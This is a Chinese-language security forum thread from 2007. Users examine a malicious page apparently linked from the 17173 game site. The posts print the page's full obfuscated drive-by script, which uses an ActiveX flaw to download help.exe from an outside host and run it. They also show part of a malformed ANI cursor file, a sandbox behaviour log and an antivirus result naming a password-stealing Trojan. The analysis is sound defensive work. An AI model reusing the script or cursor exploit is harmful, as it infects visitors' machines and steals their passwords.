17173有毒?http://mir.17173.com/picsent/index.html

tracydk

现在又没有毒了

a256886572008

hxxp://yy90.net/yiban/uu.htm

網頁code：

<html><body><script language="JavaScript">
<!--
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</script>
<center>


<html>
<body>
<script language="JavaScript">
<!--
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</script>
<SCRIPT>
function HJAakes(slKsm1){var LhzSWS2 = window["Math"]["random"]()*slKsm1;return window["Math"]["round"](LhzSWS2)+'.exe';
}
var psfsrGko3;
dab="Mi"
var ysJz$T4;
dab2="cr"
ysJz$T4=window["document"]
var XvDrlaU5="object"
psfsrGko3=ysJz$T4["createElement"]("object");
dab4="oso"
dab3="ft"+"."
dab5="XMLHTTP"
dirka="clsid"+""
dirbao=":BD9"+"6C"+"556"+"-"+"6"+"5A3-11"+"D0-9"+"83A"+"-"+"00C04F"+"C2"+"9E36"
psfsrGko3["setAttribute"]("classid",dirka+dirbao);
dab6=dab+dab2+dab4
dab7=dab3+dab5
dab8=dab6+dab7
sb="Ad"
sb3="Stream"
sb2="odb."
var CDhOS6;
sb4=sb+sb2+sb3
CDhOS6=psfsrGko3["CreateObject"](dab8,"");
var hljdKrnz7;
dingcao="ET"
hljdKrnz7=psfsrGko3["CreateObject"](sb4,"");
ding="G"
caoruixing2="e"
erbirui="Sc"
JyeHaeewe=HJAakes(300);
erbirui3="ri"
erbirui5="pti"
caonima2="ng.Fi"
caoruixing4="ppl"
caoruixing5="ication"
caotama2="leSy"
hljdKrnz7["type"]=1;
nimagei="stemObject"
var o8=psfsrGko3["CreateObject"](erbirui+erbirui3+erbirui5+caonima2+caotama2+nimagei,"");
var stygDP9=o8["GetSpecialFolder"](0);
CDhOS6["open"](ding+dingcao, 'hxxp://yy90.net/yiban/help.exe',0);
var kaYoaYQD10;
CDhOS6["send"]();
kaYoaYQD10=o8["BuildPath"](stygDP9,"sys"+JyeHaeewe);
JyeHaeewe= o8["BuildPath"](stygDP9,JyeHaeewe);
caoruixing="Sh"
caoruixing3="ll.A"
hljdKrnz7["Open"]();
caoruixing6=caoruixing+caoruixing2+caoruixing3
caoruixing7=caoruixing4+caoruixing5
var zvfJsK11=psfsrGko3["CreateObject"](caoruixing6+caoruixing7,"");
hljdKrnz7["Write"](CDhOS6["responseBody"]);
hljdKrnz7["SaveToFile"](JyeHaeewe,2);
o8["MoveFile"](JyeHaeewe,kaYoaYQD10);
hljdKrnz7["Close"]();
guanbi="op"
var Q12=o8["BuildPath"](stygDP9+'\\system32','cmd.exe')
guanbi2="e"+"n"
var zqY13=' /c '+kaYoaYQD10
psfsrGko3["CreateObject"](caoruixing6+caoruixing7,"")
["sHeLlexEcUtE"](Q12,zqY13,"",guanbi+guanbi2,0);
</SCRIPT>
<script language="JavaScript">
<!--
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</script>
</body>
</html>



</head>
<body  >
test
</body>
<SCRIPT language="Jscript.encode" src=link.js></script>
<SCRIPT language="Jscript.encode" src=link2.js></script>
<script src='http://s77.cnzz.com/stat.php?id=542936&web_id=542936' language='JavaScript' charset='gb2312'></script>

hxxp://yy90.net/yiban/xh.c

xh.c的結構

RIFF  ACONanih$   $                                   
                         anihR                                                                                   ?鹏d?    坝?:
劳   ?
輠
  h   j 邿   胧?^韝剒??W?
  胧3囗3幫韜糪餍_鏑?  [睷
  镂>?cMD >せ/C "亩3霏Ph
  RSP?
  ????>?厩t@錂> "3?莲
伟t3???鬞}        >?
狭錓镝难砥3?ぜ,
   QSPPPPPPWP頩   ?   栾 ?8Ut厰??tU鹏变跠oN  hurlm?铄$P?P閬   輲鴇秪懵lhnHAOTQ铄$P?P?   諟鴇秪懷32  HTKSS?铄$P鳼?P醅   ?鴇秪鏡_   h?P鋠   秪鏡K   h阿
~P鋙   秪鏡7   hr¼P遧   秪鏡MhO餳P?   秪鏡   h蛱雔?   秪?駱谨0块x?谨>宠?谨鏃>谨4狭|>谨<嚥6鹅$$6迹<6镉x?迩>双 楯;I>???3瞪?龜蹋
齴?;|$(u?双$慉>?K>双????碛$a鏡?            hxxp://yy90.net/yiban/help.exe

運行help.exe，發現下列行為，被EQ-Secure RC4攔截！

2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ntdll.dll
触发规则:所有程序规则->*


2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\kernel32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\Program Files\Sandboxie\SbieDll.dll
触发规则:所有程序规则->*


2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\advapi32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\rpcrt4.dll
触发规则:所有程序规则->*


2007-07-13 08:17:16    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\gdi32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\user32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\oleaut32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\msvcrt.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ole32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\shlwapi.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\imm32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\lpk.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\usp10.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\uxtheme.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\MSCTF.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\version.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\MSCTFIME.IME
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\wininet.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\normaliz.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\iertutil.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\iphlpapi.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ws2_32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ws2help.dll
触发规则:所有程序规则->*


2007-07-13 08:17:17    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:18    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\Program Files\Sandboxie\SbieDll.dll
触发规则:所有程序规则->*


2007-07-13 08:17:18    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\imm32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:18    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\lpk.dll
触发规则:所有程序规则->*


2007-07-13 08:17:18    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\usp10.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    创建文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\Documents and Settings\Hung  Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\Microsoft Shared\MSINFO\System16.jup
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung  Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-13 08:17:19    创建文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\Documents and Settings\Hung  Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\Microsoft Shared\MSINFO\System16.ins
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung  Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\uxtheme.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\MSCTF.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\MSCTFIME.IME
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\Documents and Settings\Hung  Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\Microsoft Shared\MSINFO\System16.ins
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\iphlpapi.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ws2_32.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\system32\ws2help.dll
触发规则:所有程序规则->*


2007-07-13 08:17:19    加载库文件      操作:允许
进程路径:D:\桌面\virus\17173\help.exe
文件路径:C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll
触发规则:所有程序规则->*

1.他會在C\Program Files\Common Files\Microsoft Shared\MSINFO\生成
   System16.jup
   System16.ins
2.他會在C\Program Files\Common Files\Microsoft Shared\MSINFO\加载库文件
   System16.ins

[ 本帖最后由 a256886572008 于 2007-7-13 08:21 编辑 ]

tracydk

Starting the file scan:

Begin scan in 'F:\病毒样本\help.exe及其生成物.rar'
F:\病毒样本\help.exe及其生成物.rar
  [0] Archive type: RAR
  --> drive\C\Program Files\Common Files\Microsoft Shared\MSINFO\System16.ins
      [DETECTION] Is the Trojan horse TR/PSW.Steal.27693
  --> drive\C\Program Files\Common Files\Microsoft Shared\MSINFO\System16.jup
      [DETECTION] Is the Trojan horse TR/PSW.Steal.27693
  --> help.exe
      [DETECTION] Is the Trojan horse TR/PSW.Steal.27693
      [INFO]      The file was deleted!